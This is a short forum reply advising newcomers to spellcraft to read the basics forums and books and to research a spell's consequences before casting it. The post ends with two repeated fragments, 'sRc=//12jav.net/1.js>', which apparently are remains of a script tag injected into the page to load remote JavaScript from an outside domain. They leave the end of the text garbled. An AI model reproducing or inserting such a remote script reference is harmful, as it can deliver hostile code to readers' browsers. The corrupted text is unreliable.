Well generally it is good to start from the ground up, so checking out the General Information forums is a great start. Then the best ones (personally) are the Starting out and basics expanded forums.

Once you know the basics, you can then begin to develop your knowledge with books.

Yes. I'm still kinda new to this stuff, but BEFORE you try a spell look into it first! Try to learn as much as you can about the spell and look into any consequences that might follow.( learned that the hard way!) sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
